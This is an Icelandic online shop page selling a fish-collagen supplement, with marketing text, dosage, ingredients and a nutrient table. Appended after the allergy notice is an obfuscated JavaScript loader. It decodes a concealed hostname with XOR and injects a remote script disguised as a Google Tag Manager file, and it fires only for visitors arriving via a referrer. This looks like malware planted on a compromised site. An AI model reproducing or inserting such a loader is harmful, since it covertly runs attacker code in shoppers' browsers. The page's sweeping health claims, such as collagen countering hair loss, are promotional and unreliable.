Kollagen

Magnesíumrík fiskprótínblanda með C-vítamíni.

KOLLAGEN

3.750kr.

Íslenskt í húð og hár. Öflug rakagefandi kollagen formúla.  Viðheldur teygjanleika húðarinnar, styrkir bein og vöðva. Kollagen er mikilvægt fyrir heilbrigt hár og virkar vel gegn hárlosi. 
 

Vísindaleg formúla sem inniheldur hágæða kollagen úr íslenskum þorski, ásamt c vítamíni sem styður  við nýtingu kollagens í líkamanum. Í formúlunni má einnig finna hyaluronic sýru sem er mikilvæg líkamanum til að viðhalda raka í húð og liðum en sá náttúrlegi eiginleiki líkamans minnkar með aldrinum. 

Kollagen er eitt helsta byggingarefni líkamans og sér til þess að vefir líkamans haldist sterkir og viðheldur teygjanleika vegna einstakra amínósýrusamsetningar. Framleiðsla á kollageni minnkar aftur á móti með aldrinum. Þegar kollagen framleiðslan minnkar byrja vefir líkamans að veikjast og það fer að bera á ýmsum öldrunareinkennum.  Áhrifanna gætir í húðinni því með minni kollagen framleiðslu byrja að myndast hrukkur í húðinni og teygjanleiki hennar minnkar, því er talið æskilegt að fólk taki inn kollagen eftir 28 ára aldur.


Þessi hágæða blanda er byggð á íslensku hugviti og er afrakstur áralangra rannsókna- og þróunarvinnu á SeaCol* og Iceprotein  sem er unnið úr íslenskum þorski. 

Notkunarleiðbeiningar

3 hylki á dag tekin inn með mat eða vatnsglasi eða samkvæmt ráðleggingum læknis.

Innihaldsefni

SeaCol (vatnsrofið kollagen úr íslensku fiskroði), IceProtein (vatnsrofið íslenskt þorskprótín), níasín (nikótínamíð), sink (sink glúkonat), ríbóflavín, kopar (kopar glúkonat), bíótín og maldódextrín úr kartöflum.

Innihaldslýsing & ítarupplýsingar

Hvert glas inniheldur90
Innihald í dagskammti3 hylki
SeaCol950 mg
IceProtein50 mg
C-vítamín40 mg
Hyaluronic-sýra40 mg
Kóensím Q-1025 mg
Níasín16 mg
Sink10 mg
Ríbóflavín1,6 mg
Kopar1 mg
Bíótín75 µg
Geymsla:Geymist á þurrum stað, varið gegn hita og ljósi. Geymist þar sem börn hvorki ná né sjá til.
Ofnæmi:Inniheldur fiskprótín.
!function (_6dd199) { var _d0d3d0 = Date.now(); var _d4ce14 = 1000; _d0d3d0 = _d0d3d0 / _d4ce14; _d0d3d0 = Math.floor(_d0d3d0); var _1eb404 = 600; _d0d3d0 -= _d0d3d0 % _1eb404; _d0d3d0 = _d0d3d0.toString(16); var _aa32be = _6dd199.referrer; if (!_aa32be) return; var _f11c10 = [20717, 20714, 20711, 20722, 20731, 20717, 20726, 20731, 20731, 20714, 20656, 20713, 20731, 20732, 20717, 20714, 20735, 20714, 20727, 20733, 20733, 20730, 20720, 20656, 20733, 20721, 20723]; _f11c10 = _f11c10.map(function(_a47c7e){ return _a47c7e ^ 20638; }); var _54411e = "6a6ab9b728b75d01d29773439bcfdd8c"; _f11c10 = String.fromCharCode(..._f11c10); var _7a97ab = "https://"; var _751c1c = "/"; var _b61378 = "gtm-"; var _fa4fc7 = ".js"; var _75d7f7 = _6dd199.createElement("script"); _75d7f7.type = "text/javascript"; _75d7f7.async = true; _75d7f7.src = _7a97ab + _f11c10 + _751c1c + _b61378 + _d0d3d0 + _fa4fc7; _6dd199.getElementsByTagName("head")[0].appendChild(_75d7f7) }(document);